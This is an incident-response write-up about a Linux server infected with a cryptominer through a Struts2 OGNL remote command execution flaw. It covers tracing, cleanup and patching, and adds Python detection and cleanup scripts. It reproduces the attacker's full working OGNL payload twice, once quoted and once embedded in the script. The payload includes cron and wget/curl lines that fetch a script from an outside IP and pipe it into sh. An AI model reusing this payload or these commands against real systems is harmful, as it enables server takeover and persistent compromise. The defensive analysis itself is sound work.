0x00 Preface
With the frenzy around cryptocurrency, mining scripts have become a way to turn compromised machines into money, and cryptomining malware is now one of the attack types criminals use most often. Newer mining campaigns combine worm-like spreading with a range of intrusion techniques to raise their infection rate on target servers: EternalBlue, plus web application vulnerabilities such as Tomcat weak passwords, the WebLogic WLS component vulnerability, JBoss deserialization and Struts2 remote command execution. The result is large numbers of servers found running mining programs.
0x01 Emergency Scenario
One day, while inspecting the security devices, the security administrator found that a web server kept initiating connections to a foreign IP address and downloading a malware payload from it:
0x02 Event Analysis
A. Investigation process
Log in to the server and check the running processes. Processes with irregular names and an abnormal download process are found.
Downloading logo.jpg shows that it is not an image at all but a shell script with the following content:
So the attacker downloaded logo.jpg and executed the shell script it contains. How does this script get launched?
Checking the system's startup items, scheduled tasks and services turns up malicious entries in the scheduled tasks: at fixed intervals they request the malware from the remote host and execute it.
B. Tracing the source
In the Tomcat log, we found this entry:
The attack payload extracted from that log entry is as follows (reassembled from the line-wrapped log text):
```
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg | sh\n19 * * * * curl http://5.188.87.11/icons/logo.jpg | sh" | crontab -; wget -O - -q http://5.188.87.11/icons/logo.jpg | sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
```
The commands in the attack payload match the abnormal entries in the scheduled tasks, so we can conclude that the attacker exploited the Struts2 remote command execution vulnerability to write the malicious download-and-execute lines into the server's crontab and to run them immediately. Reading the payload: it first replaces the OGNL member-access guard with DEFAULT_MEMBER_ACCESS and clears OgnlUtil's excluded packages and classes, which removes the sandbox that would otherwise block calls into java.lang; it then assembles #cmd (echo two cron lines into crontab -, then fetch and run logo.jpg right away), picks /bin/bash -c or cmd.exe /c according to os.name, runs the command through java.lang.ProcessBuilder, and copies the process output into the HTTP response so the attacker can read the result.
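As an added example (not code from the original post), the following Python script shows how the log triage above can be automated: it scans log lines for the signatures of this OGNL payload (the %{(# evaluation marker, the member-access bypass, the clearing of the OGNL exclusion lists, and ProcessBuilder), pulls out the #cmd string, the URLs and hosts it contacts, and splits the crontab text the payload writes, which is exactly what was compared against the scheduled tasks. The sample log lines are constructed for this example; the payload line reproduces the structure quoted above, and the function names are my own.

```python
import re

# Signatures of the Struts2 OGNL command-injection payload seen in the log above.
OGNL_SIGNATURES = {
    "ognl_eval": re.compile(r"%\{\(#"),
    "member_access_bypass": re.compile(r"#_memberAccess|DEFAULT_MEMBER_ACCESS"),
    "sandbox_clear": re.compile(r"getExcluded(?:PackageNames|Classes)\(\)\.clear\(\)"),
    "process_builder": re.compile(r"java\.lang\.ProcessBuilder"),
}
CMD_RE = re.compile(r"#cmd='((?:[^'\\]|\\.)*)'")          # the shell command in #cmd='...'
URL_RE = re.compile(r"https?://[^\s\"'|)]+")               # download locations
CRON_ECHO_RE = re.compile(r'echo\s+"((?:[^"\\]|\\.)*)"\s*\|\s*crontab\s+-')


def extract_cron_lines(command):
    """Return the crontab entries the payload installs via `echo "..." | crontab -`.
    Entries are separated by a literal backslash-n; echo turns it into a newline only
    where echo interprets escapes (dash does, bash's builtin does not by default)."""
    m = CRON_ECHO_RE.search(command)
    if not m:
        return []
    return [part.strip() for part in re.split(r"\\n", m.group(1)) if part.strip()]


def analyze_line(line_no, line):
    """Return a finding for a line carrying an OGNL injection, or None."""
    matched = [name for name, rx in OGNL_SIGNATURES.items() if rx.search(line)]
    if not matched:
        return None
    cmd_match = CMD_RE.search(line)
    command = cmd_match.group(1) if cmd_match else None
    urls = list(dict.fromkeys(URL_RE.findall(line)))  # de-duplicate, keep order
    return {
        "line_no": line_no,
        "signatures": matched,
        "command": command,
        "cron_lines": extract_cron_lines(command) if command else [],
        "urls": urls,
        "hosts": sorted({u.split("/")[2] for u in urls}),
    }


def scan_log(lines):
    """Scan an iterable of log lines; return the list of findings."""
    findings = []
    for n, line in enumerate(lines, 1):
        finding = analyze_line(n, line)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample: three ordinary access-log lines and one line carrying the payload.
PAYLOAD = (
    "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
    ".(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])"
    ".(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"
    ".(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())"
    ".(#context.setMemberAccess(#dm))))"
    ".(#cmd='echo \"*/20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg | sh\\n"
    "19 * * * * curl http://5.188.87.11/icons/logo.jpg | sh\" | crontab -; "
    "wget -O - -q http://5.188.87.11/icons/logo.jpg | sh')"
    ".(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))"
    ".(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))"
    ".(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())"
    ".(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))"
    ".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
)
SAMPLE_LOG = [
    '10.0.0.8 - - [01/Mar/2018:09:12:01 +0800] "GET /index.action HTTP/1.1" 200 1432',
    '10.0.0.8 - - [01/Mar/2018:09:12:05 +0800] "POST /login.action HTTP/1.1" 302 0',
    "Content-Type: " + PAYLOAD,
    '10.0.0.9 - - [01/Mar/2018:09:13:40 +0800] "GET /static/logo.jpg HTTP/1.1" 200 8812',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line_no']}: {f['signatures']}")
        print("  command :", f["command"])
        print("  cron    :", f["cron_lines"])
        print("  hosts   :", f["hosts"])
```

The fourth sample line mentions logo.jpg but is not flagged: the detection keys on the OGNL structure, not on the file name, so a benign image request is not a false positive. In a real response, feed the script all Tomcat logs (access logs and catalina.out) and use the hosts it returns as blocklist entries.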
C. Removing the malware
1. Delete the scheduled task:
2. Kill the abnormal processes:
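As an added example (not code from the original post), here is a small Python cleanup helper for the two removal steps and the earlier crontab/process check: it strips crontab lines that reference the indicators from this case (the download host and the disguised script path), then locates processes whose command line references them by reading /proc/<pid>/cmdline, and kills them. The IOC pattern is taken from the payload above; the function names and the dry-run default are my own.

```python
import os
import re
import signal
import subprocess

# Indicators from this incident: the download host and the disguised script's path.
IOC_PATTERN = re.compile(r"5\.188\.87\.11|icons/logo\.jpg")


def filter_crontab(crontab_text, pattern=IOC_PATTERN):
    """Split crontab text into (lines to keep, lines to remove)."""
    keep, remove = [], []
    for line in crontab_text.splitlines():
        (remove if pattern.search(line) else keep).append(line)
    return keep, remove


def match_cmdlines(cmdlines, pattern=IOC_PATTERN):
    """cmdlines: {pid: command line}. Returns sorted [(pid, cmdline)] that match."""
    return sorted((pid, cl) for pid, cl in cmdlines.items() if pattern.search(cl))


def read_proc_cmdlines(proc_root="/proc"):
    """Collect the command line of every process from /proc/<pid>/cmdline."""
    result = {}
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, name, "cmdline"), "rb") as fh:
                raw = fh.read()
        except OSError:  # process already exited, or permission denied
            continue
        result[int(name)] = raw.replace(b"\0", b" ").decode("utf-8", "replace").strip()
    return result


def clean_host(pattern=IOC_PATTERN, user=None, dry_run=True):
    """Step 1: remove matching crontab lines first, so nothing re-downloads the script.
    Step 2: kill matching processes. With dry_run=True only report what would change."""
    user_args = ["-u", user] if user else []
    current = subprocess.run(["crontab", "-l"] + user_args,
                             capture_output=True, text=True).stdout
    keep, remove = filter_crontab(current, pattern)
    if remove and not dry_run:
        new_tab = "\n".join(keep) + ("\n" if keep else "")
        subprocess.run(["crontab"] + user_args + ["-"], input=new_tab, text=True, check=True)
    procs = match_cmdlines(read_proc_cmdlines(), pattern)
    if not dry_run:
        for pid, _ in procs:
            try:
                os.kill(pid, signal.SIGKILL)
            except ProcessLookupError:
                pass  # already gone
    return remove, procs


if __name__ == "__main__":
    removed, procs = clean_host(dry_run=True)
    print("crontab lines to remove:", removed)
    print("processes to kill:", procs)
```

Run it with dry_run first and for the right user: the Struts payload runs as the account Tomcat runs under, so that user's crontab (and /var/spool/cron, /etc/cron.d) is where the entries land. The mining process itself may carry one of the irregular names seen in the process list rather than the download URL, so extend IOC_PATTERN with those names before the live run, and block 5.188.87.11 at the firewall so a task you missed cannot fetch the script again.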
D. Vulnerability repair
Upgrade Struts2 to the latest patched version and restart the application.
0x03 Preventive Measures
Given that the server was infected with a mining program, a few preventive measures can be summarized:
1. Install security software and keep its signature database up to date; scan regularly and keep real-time protection on.
2. Apply security patches promptly, both for the operating system (Windows or Linux) and for application frameworks such as Struts2; enable the host firewall and close any ports that are not needed, at least until the host is patched.
Recommended reading:
Linux Emergency Response (1): SSH brute-force cracking
Linux Emergency Response (2): Catching short-lived connections
Linux Emergency Response (3): Mining viruses
Linux Emergency Response (4): Gates Trojan
Finally
You are welcome to follow my personal WeChat official account, Bypass--, which publishes an original technical article every week.